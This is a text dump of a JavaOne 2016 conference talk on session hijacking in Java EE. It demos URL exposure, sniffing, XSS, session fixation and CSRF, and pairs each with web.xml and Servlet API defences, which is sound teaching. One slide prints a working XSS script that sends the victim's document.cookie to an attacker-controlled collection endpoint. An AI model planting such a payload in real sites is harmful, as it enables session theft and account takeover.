SlideShare a Scribd company logo
1 of 53
Download to read offline
The	
  Hacker’s	
  Guide	
  	
  
to	
  Session	
  Hijacking	
  	
  
in	
  Java	
  EE
Patrycja	
  Wegrzynowicz	
  
CTO,	
  Yonita,	
  Inc.	
  
JavaOne	
  2016
About	
  Me
• 15+	
  professional	
  experience	
  	
  
• SoRware	
  engineer,	
  architect,	
  head	
  of	
  
soRware	
  R&D	
  	
  
• Author	
  and	
  speaker	
  	
  
• JavaOne,	
  Devoxx,	
  JavaZone,	
  TheServerSide	
  
Java	
  Symposium,	
  Jazoon,	
  OOPSLA,	
  ASE,	
  
others	
  	
  
• Top	
  10	
  Women	
  in	
  Tech	
  2016	
  in	
  Poland	
  
• Founder	
  and	
  CTO	
  of	
  Yonita	
  
• Automated	
  detecZon	
  and	
  refactoring	
  of	
  
soRware	
  defects	
  
• Trainings	
  and	
  code	
  reviews	
  
• Security,	
  performance,	
  concurrency,	
  
databases	
  	
  
• Twi[er	
  @yonlabs	
  
About	
  Me
• 15+	
  professional	
  experience	
  	
  
• SoRware	
  engineer,	
  architect,	
  head	
  of	
  soRware	
  
R&D	
  	
  
• Author	
  and	
  speaker	
  	
  
• JavaOne,	
  Devoxx,	
  JavaZone,	
  TheServerSide	
  
Java	
  Symposium,	
  Jazoon,	
  OOPSLA,	
  ASE,	
  others	
  	
  
• Top	
  10	
  Women	
  in	
  Tech	
  2016	
  in	
  Poland	
  
• Founder	
  and	
  CTO	
  of	
  Yonita	
  
• Bridge	
  the	
  gap	
  between	
  the	
  industry	
  and	
  the	
  
academia	
  
• Automated	
  detecZon	
  and	
  refactoring	
  of	
  
soRware	
  defects	
  
• Trainings	
  and	
  code	
  reviews	
  
• Security,	
  performance,	
  concurrency,	
  databases	
  	
  
• Twi[er	
  @yonlabs	
  
Agenda
• HTTP,	
  session,	
  OWASP	
  
• 4	
  demos	
  to	
  hijack	
  a	
  session	
  
• Best	
  pracZces	
  in	
  Java	
  EE
Security Stories 2014-­‐2015
#!/bin/bash
Security Stories 2015-­‐2016
#!/bin/bash
HTTP
HTTP
What	
  is	
  Web	
  Session?
• Session	
  idenZfies	
  interacZons	
  with	
  one	
  user	
  
• Unique	
  idenZfier	
  associated	
  with	
  every	
  request	
  
• Cookie	
  
• Header	
  
• Parameter	
  
• Hidden	
  field
OWASP	
  Top	
  10	
  Risks
Session	
  Hijacking
Session	
  Hijacking
• Session	
  theR	
  
• URL,	
  sniffing,	
  logs,	
  XSS	
  
Session	
  Hijacking
• Session	
  theR	
  
• URL,	
  sniffing,	
  logs,	
  XSS	
  	
  
• Session	
  fixaZon
Session	
  Hijacking
• Session	
  theR	
  
• URL,	
  sniffing,	
  logs,	
  XSS	
  
• Session	
  fixaZon	
  
• Session	
  predicZon	
  
Demo:	
  Session	
  Exposed	
  in	
  URL
• I	
  will	
  log	
  into	
  the	
  sample	
  applicaZon	
  
• I	
  will	
  post	
  a	
  link	
  with	
  my	
  session	
  id	
  on	
  Twi[er	
  	
  
• @yonlabs	
  
• Hijack	
  my	
  session	
  :)
How	
  to	
  Avoid	
  Session	
  Id	
  in	
  URL?
• Default:	
  allows	
  cookies	
  and	
  URL	
  rewriZng	
  	
  
• Default	
  cookie,	
  fall	
  back	
  on	
  URL	
  rewriZng	
  
• To	
  embrace	
  all	
  users	
  
• Disabled	
  cookies	
  in	
  a	
  browser	
  
• Disable	
  URL	
  rewriZng	
  in	
  an	
  app	
  server	
  
• App	
  server	
  specific	
  
• Tracking	
  mode	
  
• Java	
  EE	
  6,	
  web.xml
web.xml
<!-­‐-­‐	
  Java	
  EE	
  6,	
  Servlet	
  3.0	
  -­‐-­‐>	
  
<session-­‐config>	
  
	
  	
  	
  	
  <tracking-­‐mode>COOKIE</tracking-­‐mode>	
  
</session-­‐config>	
  
Session	
  Sniffing
• How	
  to	
  find	
  out	
  a	
  cookie?	
  
• e.g.,	
  network	
  monitoring	
  and	
  packet	
  sniffing	
  
• How	
  to	
  use	
  a	
  cookie?	
  
• Browsers’	
  plugins	
  and	
  add-­‐ons	
  (e.g.,	
  Cookie	
  Manager	
  for	
  Firefox)	
  
• IntercepZng	
  proxy	
  (e.g.,	
  OWASP	
  ZAP)	
  
• DIY:	
  write	
  your	
  own	
  code
Demo:	
  Session	
  Sniffing
• You	
  will	
  log	
  into	
  the	
  sample	
  applicaZon	
  
• Any	
  non	
  empty	
  user	
  name	
  
• Please,	
  use	
  meaningful	
  names!	
  
• I	
  will	
  monitor	
  network	
  traffic	
  
• tcpdump	
  
• I	
  will	
  hijack	
  one	
  of	
  your	
  sessions	
  
• Cookie	
  Manager
How	
  to	
  Avoid	
  Session	
  
Exposure	
  During	
  Transport?
How	
  to	
  Avoid	
  Session	
  Exposure	
  
During	
  Transport?
Encrypt!	
  Use	
  HTTPS.
web.xml
<security-­‐constraint>	
  
<user-­‐data-­‐constraint>	
  
<transport-­‐guarantee>	
  
CONFIDENTIAL	
  
</transport-­‐guarantee>	
  
</user-­‐data-­‐constraint>	
  
</security-­‐constraint>
web.xml
<!-­‐-­‐	
  Java	
  EE	
  6,	
  Servlet	
  3.0	
  -­‐-­‐>	
  
<session-­‐config>	
  
	
  	
  	
  	
  <cookie-­‐config>	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  <secure>true</secure>	
  
	
  	
  	
  	
  </cookie-­‐config>	
  
	
  	
  	
  	
  <tracking-­‐mode>COOKIE</tracking-­‐mode>	
  
</session-­‐config>	
  
Session	
  Exposure
• Transport	
  
• Unencrypted	
  transport	
  
• Client-­‐side	
  
• XSS	
  
• A[acks	
  on	
  browsers/OS	
  
• Server-­‐side	
  
• Logs	
  
• Session	
  replicaZon	
  
• Memory	
  dump
How	
  to	
  Steal	
  a	
  Session	
  if	
  
Secure	
  Transport	
  Is	
  Used?
How	
  to	
  Steal	
  a	
  Session	
  if	
  Secure	
  
Transport	
  Is	
  Used?
A3ack	
  a	
  client!
Demo:	
  Session	
  Grabbed	
  by	
  XSS
• JavaScript	
  code	
  to	
  steal	
  a	
  cookie	
  
• Servlet	
  to	
  log	
  down	
  stolen	
  cookies	
  
• Vulnerable	
  applicaZon	
  to	
  be	
  exploited	
  via	
  injected	
  
JavaScript	
  code	
  (XSS)
Demo:	
  Session	
  Grabbed	
  by	
  XSS
• I	
  will	
  store	
  malicious	
  JavaScript	
  code	
  in	
  the	
  app	
  
• Through	
  wriZng	
  an	
  “opinion”	
  	
  
• Log	
  into	
  the	
  vulnerable	
  applicaZon	
  
• h[ps://demo.yonita.com:8181/session-­‐xss/	
  	
  
• Any	
  non	
  empty	
  user	
  name	
  
• Please,	
  use	
  meaningful	
  names!	
  
• Click	
  ‚View	
  others	
  opinions’	
  page	
  
• Wait	
  unZl	
  I	
  will	
  hijack	
  your	
  session	
  :)
JavaScript	
  to	
  Steal	
  a	
  Cookie
<script>	
  
<!-­‐-­‐	
  hacker’s	
  service	
  -­‐-­‐>	
  
theR	
  =	
  ’h[p://demo.yonita.com/steal/steal?cookie=’	
  
<!-­‐-­‐	
  to	
  bypass	
  Same	
  Origin	
  Policy	
  -­‐-­‐>	
  
image	
  =	
  new	
  Image();	
  
image.src	
  =	
  theR	
  +	
  document.cookie;	
  	
  
</script>	
  
web.xml
<!-­‐-­‐	
  Java	
  EE	
  6,	
  Servlet	
  3.0	
  -­‐-­‐>	
  
<session-­‐config>	
  
	
  	
  	
  	
  <cookie-­‐config>	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  <h[p-­‐only>true</h[p-­‐only>	
  
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  <secure>true</secure>	
  
	
  	
  	
  </cookie-­‐config>	
  
	
  	
  	
  	
  <tracking-­‐mode>COOKIE</tracking-­‐mode>	
  
</session-­‐config>	
  
Session	
  FixaZon
• Session	
  fixaZon	
  a[ack	
  uZlizes	
  a	
  session	
  creaZon
When	
  Session	
  is	
  Created?
A. On	
  storing	
  an	
  a[ribute	
  in	
  a	
  session	
  for	
  the	
  first	
  Zme	
  
B. On	
  calling	
  request.getSession(true)	
  /()	
  for	
  the	
  first	
  
Zme	
  
C. On	
  a	
  successful	
  login	
  
D. None	
  of	
  the	
  above
When	
  Session	
  is	
  Created?
A. On	
  storing	
  an	
  a[ribute	
  in	
  a	
  session	
  for	
  the	
  first	
  Zme	
  
B. On	
  calling	
  request.getSession(true)/()	
  for	
  the	
  first	
  
Zme	
  
C. On	
  a	
  successful	
  login	
  
D. None	
  of	
  the	
  above
When	
  Session	
  is	
  Created?
A. On	
  storing	
  an	
  a[ribute	
  in	
  a	
  session	
  for	
  the	
  first	
  Zme	
  
B. On	
  calling	
  request.getSession(true)/()	
  for	
  the	
  first	
  
Zme	
  
• H[pServletRequest::getSession(true)	
  
• H[pServletRequest::getSession()	
  
• an	
  implicit	
  session	
  object	
  on	
  JSP	
  pages	
  
• unless	
  <%@	
  page	
  session="false"	
  %>	
  
C. On	
  a	
  successful	
  login	
  
D. None	
  of	
  the	
  above
Session	
  FixaZon:	
  Scenario	
  1
• Hacker	
  opens	
  a	
  web	
  page	
  of	
  a	
  system	
  in	
  a	
  browser	
  	
  
• JSP	
  page:	
  a	
  new	
  session	
  iniZalized!	
  
• Hacker	
  writes	
  down	
  the	
  session	
  id	
  	
  
• Hacker	
  leaves	
  the	
  browser	
  open	
  	
  
• User	
  comes	
  and	
  logs	
  into	
  the	
  app	
  
• Uses	
  the	
  session	
  iniZalized	
  by	
  the	
  hacker	
  	
  
• Hacker	
  uses	
  the	
  wri[en	
  down	
  session	
  id	
  to	
  hijack	
  the	
  
user’s	
  session	
  
Session	
  FixaZon:	
  Scenario	
  2
• Hacker	
  opens	
  a	
  web	
  page	
  of	
  a	
  system	
  in	
  a	
  browser	
  	
  
• JSP	
  page:	
  a	
  new	
  session	
  iniZalized!	
  
• Hacker	
  prepares	
  a	
  link	
  with	
  the	
  session	
  id	
  in	
  URL	
  
• Hacker	
  tricks	
  a	
  user	
  to	
  click	
  the	
  link	
  
• e.g.	
  sends	
  an	
  email	
  with	
  the	
  link	
  
• User	
  clicks	
  the	
  link	
  
• Uses	
  the	
  session	
  iniZalized	
  by	
  the	
  hacker	
  	
  
• Hacker	
  uses	
  the	
  wri[en	
  down	
  session	
  id	
  to	
  hijack	
  the	
  
user’s	
  session	
  
Session	
  FixaZon:	
  SoluZon
• Change	
  the	
  session	
  ID	
  aRer	
  a	
  successful	
  login	
  
• more	
  generally:	
  escalaZon	
  of	
  privileges
Servlet	
  3.0/3.1	
  Spec
• Containers	
  may	
  create	
  HTTP	
  Session	
  objects	
  to	
  track	
  
login	
  state.	
  If	
  a	
  developer	
  creates	
  a	
  session	
  while	
  a	
  
user	
  is	
  not	
  authenZcated,	
  and	
  the	
  container	
  then	
  
authenZcates	
  the	
  user,	
  the	
  session	
  visible	
  to	
  
developer	
  code	
  a=er	
  login	
  must	
  be	
  the	
  same	
  session	
  
object	
  that	
  was	
  created	
  prior	
  to	
  login	
  occurring	
  so	
  
that	
  there	
  is	
  no	
  loss	
  of	
  session	
  informaZon.
Session	
  FixaZon:	
  SoluZon	
  in	
  
Java	
  EE
• Change	
  the	
  session	
  ID	
  aRer	
  a	
  successful	
  login	
  
• more	
  generally:	
  escalaZon	
  of	
  privileges	
  
• Java	
  EE	
  7	
  (Servlet	
  3.1)	
  
• H[pServletRequest.changeSessionId()	
  
• Java	
  EE	
  6	
  
• H[pSession.invalidate()	
  
• H[pServletRequest.getSession(true)
Secure	
  Session	
  Management	
  
Best	
  PracZces
• Random,	
  unpredictable	
  session	
  id	
  
• At	
  least	
  16	
  characters	
  
• Secure	
  transport	
  and	
  storage	
  of	
  session	
  id	
  
• Cookie	
  preferred	
  over	
  URL	
  rewriZng	
  	
  
• Cookie	
  flags:	
  secure,	
  h[pOnly	
  	
  
• Don’t	
  use	
  too	
  broad	
  cookie	
  paths	
  	
  
• Consistent	
  use	
  of	
  HTTPS	
  
• Don’t	
  mix	
  HTTP	
  and	
  HTTPS	
  under	
  the	
  same	
  

domain/cookie	
  path	
  
Consistent	
  Use	
  of	
  HTTPS	
  
Typical	
  Errors
• StaZc	
  content	
  served	
  as	
  HTTP	
  from	
  the	
  same	
  domain	
  
name	
  
• Pre-­‐authenZcated	
  pages	
  as	
  HTTP,	
  post-­‐authenZcated	
  
pages	
  as	
  HTTPS	
  from	
  the	
  same	
  domain	
  name	
  
• Login	
  form	
  as	
  HTTPS,	
  the	
  rest	
  as	
  HTTP	
  
• GMail	
  for	
  a	
  few	
  years	
  aRer	
  its	
  launch!
Secure	
  AuthenZcaZon	
  	
  
Best	
  PracZces
• Session	
  creaZon	
  and	
  destrucZon	
  	
  
• New	
  session	
  id	
  aRer	
  login	
  	
  
• Logout	
  bu[on	
  	
  
• Session	
  Zmeouts:	
  2”-­‐5”	
  for	
  criZcal	
  apps,	
  15”-­‐30”	
  for	
  

typical	
  apps	
  	
  
• DetecZng	
  session	
  anomalies	
  
• Basic	
  heurisZc:	
  a	
  session	
  associated	
  with	
  the	
  headers	
  of	
  the	
  first	
  request	
  	
  
• The	
  fingerprint	
  of	
  a	
  first	
  reques:	
  IP,	
  User-­‐Agent,…	
  
• If	
  they	
  don’t	
  match,	
  something’s	
  going	
  on	
  (invalidate!)	
  	
  
• OWASP	
  ModSecurity	
  Web	
  ApplicaZon	
  Firewall	
  
• Rules	
  for	
  detecZng	
  common	
  security	
  a[acks
Secure	
  AuthenZcaZon	
  	
  
Best	
  PracZces	
  cont.
• Java	
  EE	
  
• DeclaraZve	
  authenZcaZon	
  implemented	
  using	
  descriptors	
  
• ProgrammaZc	
  authenZcaZon	
  
• AnnotaZons,	
  H[pServletRequest:	
  authenZcate,	
  login,	
  logout	
  	
  
• Advanced	
  flows	
  and	
  requirements	
  
• Custom	
  implementaZon	
  	
  
• Servlet	
  3.0	
  vs	
  3.1	
  
• the	
  session	
  visible	
  to	
  developer	
  code	
  a=er	
  login	
  must	
  be	
  the	
  same	
  session	
  object	
  that	
  was	
  
created	
  prior	
  to	
  login	
  
• Session	
  fixaZon	
  problem	
  
• 3.0:	
  no	
  way	
  to	
  change	
  a	
  session	
  id!	
  
• 3.1:	
  changeSessionId	
  
• Check	
  out	
  the	
  container	
  implementaZons	
  
• Java	
  EE	
  6	
  vs.	
  Java	
  EE	
  7
Secure	
  AuthenZcaZon	
  	
  
Best	
  PracZces	
  cont.
• My	
  choice	
  
• DeclaraZve	
  authenZcaZon	
  with	
  Java	
  EE	
  7	
  
• Check	
  out	
  your	
  applicaZon	
  server	
  behavior!	
  
• ProgrammaZc	
  authenZcaZon	
  with	
  Java	
  EE	
  6	
  or	
  when	
  advanced	
  flow	
  
need	
  in	
  Java	
  EE	
  7	
  
• H[pServletRequest:	
  authenZcate,	
  login,	
  logout	
  
• Custom	
  implementaZon
What	
  If	
  We	
  Can’t	
  Steal	
  a	
  
Cookie?
What	
  If	
  We	
  Can’t	
  Steal	
  a	
  
Cookie?
We	
  can	
  sDll	
  use	
  it!
Demo:	
  CSRF	
  to	
  Use	
  a	
  Cookie
• I	
  will	
  log	
  into	
  the	
  applicaZon	
  
• Log	
  into	
  the	
  applicaZon	
  
• h[ps://demo.yonita.com:8181/session-­‐csrf/	
  
• Any	
  non	
  empty	
  user	
  name	
  	
  
• Please,	
  use	
  meaningful	
  names!	
  
• Click	
  the	
  link	
  and	
  the	
  bu[on	
  ‘Click	
  me’	
  
• h[ps://demo.yonita.com:8181/a[ack-­‐csrf/	
  
• I	
  will	
  check	
  my	
  account	
  balance	
  :)
CSRF:	
  SoluZon
• Use	
  a	
  unique	
  token	
  for	
  each	
  request	
  
• anZ-­‐CSRF	
  token	
  
• Remember	
  about	
  your	
  web	
  forms	
  and	
  REST	
  services	
  
• POST	
  requests	
  
• Other	
  HTTP	
  acZons	
  as	
  needed	
  
• Web	
  framework	
  dependent
Conclusion
You	
  are	
  never	
  safe!
A	
  fool	
  with	
  a	
  tool	
  is	
  only	
  a	
  fool!
ConZnuous	
  Learning	
  
Please,	
  vote!	
  :)
Q&A
• patrycja@yonita.com	
  
• @yonlabs

More Related Content

What's hot

Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakAbraham Aranguren
 
Java Web Application Security - Utah JUG 2011
Java Web Application Security - Utah JUG 2011Java Web Application Security - Utah JUG 2011
Java Web Application Security - Utah JUG 2011Matt Raible
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universeSebastien Gioria
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Matt Raible
 
Is code review the solution?
Is code review the solution?Is code review the solution?
Is code review the solution?Tiago Mendo
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding PracticesOWASPKerala
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
 
Java Web Application Security - Jazoon 2011
Java Web Application Security - Jazoon 2011Java Web Application Security - Jazoon 2011
Java Web Application Security - Jazoon 2011Matt Raible
 
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015Matt Raible
 
Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSebastien Gioria
 
42 minutes to secure your code....
42 minutes to secure your code....42 minutes to secure your code....
42 minutes to secure your code....Sebastien Gioria
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Java ee 8 + security overview
Java ee 8 + security overviewJava ee 8 + security overview
Java ee 8 + security overviewRudy De Busscher
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Matt Raible
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 

What's hot (20)

Pwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreakPwning mobile apps without root or jailbreak
Pwning mobile apps without root or jailbreak
 
Java Web Application Security - Utah JUG 2011
Java Web Application Security - Utah JUG 2011Java Web Application Security - Utah JUG 2011
Java Web Application Security - Utah JUG 2011
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
 
OWASP, PHP, life and universe
OWASP, PHP, life and universeOWASP, PHP, life and universe
OWASP, PHP, life and universe
 
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
Java Web Application Security with Java EE, Spring Security and Apache Shiro ...
 
Is code review the solution?
Is code review the solution?Is code review the solution?
Is code review the solution?
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingSmart Sheriff, Dumb Idea, the wild west of government assisted parenting
Smart Sheriff, Dumb Idea, the wild west of government assisted parenting
 
Java Web Application Security - Jazoon 2011
Java Web Application Security - Jazoon 2011Java Web Application Security - Jazoon 2011
Java Web Application Security - Jazoon 2011
 
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
#NoXML: Eliminating XML in Spring Projects - SpringOne 2GX 2015
 
Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introduction
 
42 minutes to secure your code....
42 minutes to secure your code....42 minutes to secure your code....
42 minutes to secure your code....
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Java ee 8 + security overview
Java ee 8 + security overviewJava ee 8 + security overview
Java ee 8 + security overview
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 

Similar to The Hacker's Guide To Session Hijacking

JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Ruby on Rails Security Guide
Ruby on Rails Security GuideRuby on Rails Security Guide
Ruby on Rails Security Guideihji
 
Chrome Devtools Protocol via Selenium/Appium (English)
Chrome Devtools Protocol via Selenium/Appium (English)Chrome Devtools Protocol via Selenium/Appium (English)
Chrome Devtools Protocol via Selenium/Appium (English)Kazuaki Matsuo
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingColdFusionConference
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Integration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + SeleniumIntegration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + Seleniumtka
 
08 session-tracking
08 session-tracking08 session-tracking
08 session-trackingsnopteck
 
08 session-tracking
08 session-tracking08 session-tracking
08 session-trackingsnopteck
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsrobertjd
 
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010wremes
 
Microservices on Application Container Cloud Service
Microservices on Application Container Cloud ServiceMicroservices on Application Container Cloud Service
Microservices on Application Container Cloud ServiceMaarten Smeets
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
 
Php 07-cookies-sessions
Php 07-cookies-sessionsPhp 07-cookies-sessions
Php 07-cookies-sessionsYUSRA FERNANDO
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
we45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with Pythonwe45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with PythonAbhay Bhargav
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsSecuRing
 

Similar to The Hacker's Guide To Session Hijacking (20)

JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Ruby on Rails Security Guide
Ruby on Rails Security GuideRuby on Rails Security Guide
Ruby on Rails Security Guide
 
Chrome Devtools Protocol via Selenium/Appium (English)
Chrome Devtools Protocol via Selenium/Appium (English)Chrome Devtools Protocol via Selenium/Appium (English)
Chrome Devtools Protocol via Selenium/Appium (English)
 
DefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysisDefCamp 2013 - Http header analysis
DefCamp 2013 - Http header analysis
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Integration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + SeleniumIntegration Test Cucumber + Webrat + Selenium
Integration Test Cucumber + Webrat + Selenium
 
08 session-tracking
08 session-tracking08 session-tracking
08 session-tracking
 
08 session-tracking
08 session-tracking08 session-tracking
08 session-tracking
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
 
OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010OSSEC @ ISSA Jan 21st 2010
OSSEC @ ISSA Jan 21st 2010
 
Microservices on Application Container Cloud Service
Microservices on Application Container Cloud ServiceMicroservices on Application Container Cloud Service
Microservices on Application Container Cloud Service
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
 
Php 07-cookies-sessions
Php 07-cookies-sessionsPhp 07-cookies-sessions
Php 07-cookies-sessions
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
we45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with Pythonwe45 DEFCON Workshop - Building AppSec Automation with Python
we45 DEFCON Workshop - Building AppSec Automation with Python
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive ControlsTen Commandments of Secure Coding - OWASP Top Ten Proactive Controls
Ten Commandments of Secure Coding - OWASP Top Ten Proactive Controls
 
PHP - Introduction to PHP Cookies and Sessions
PHP - Introduction to PHP Cookies and SessionsPHP - Introduction to PHP Cookies and Sessions
PHP - Introduction to PHP Cookies and Sessions
 

More from Patrycja Wegrzynowicz

More from Patrycja Wegrzynowicz (7)

The Hacker's Guide to Kubernetes: Reloaded
The Hacker's Guide to Kubernetes: ReloadedThe Hacker's Guide to Kubernetes: Reloaded
The Hacker's Guide to Kubernetes: Reloaded
 
The Hacker's Guide to Kubernetes
The Hacker's Guide to KubernetesThe Hacker's Guide to Kubernetes
The Hacker's Guide to Kubernetes
 
The Hacker's Guide to Session Hijacking
The Hacker's Guide to Session Hijacking The Hacker's Guide to Session Hijacking
The Hacker's Guide to Session Hijacking
 
Second Level Cache in JPA Explained
Second Level Cache in JPA ExplainedSecond Level Cache in JPA Explained
Second Level Cache in JPA Explained
 
Thinking Beyond ORM in JPA
Thinking Beyond ORM in JPAThinking Beyond ORM in JPA
Thinking Beyond ORM in JPA
 
Lazy vs. Eager Loading Strategies in JPA 2.1
Lazy vs. Eager Loading Strategies in JPA 2.1Lazy vs. Eager Loading Strategies in JPA 2.1
Lazy vs. Eager Loading Strategies in JPA 2.1
 
Thinking Beyond ORM in JPA
Thinking Beyond ORM in JPAThinking Beyond ORM in JPA
Thinking Beyond ORM in JPA
 

Recently uploaded

VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
